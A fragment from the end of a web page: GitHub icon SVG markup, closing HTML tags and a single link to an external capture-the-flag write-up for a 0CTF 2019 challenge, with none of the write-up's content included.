<path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path>
</svg>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2">
<path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path>
</svg>
</clipboard-copy>
</div>
</template>

</div>

<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div>
</body>
</html>

Original writeup (https://github.com/agadient/CTF/tree/master/0ctf_2019/baby_aegis).

Comments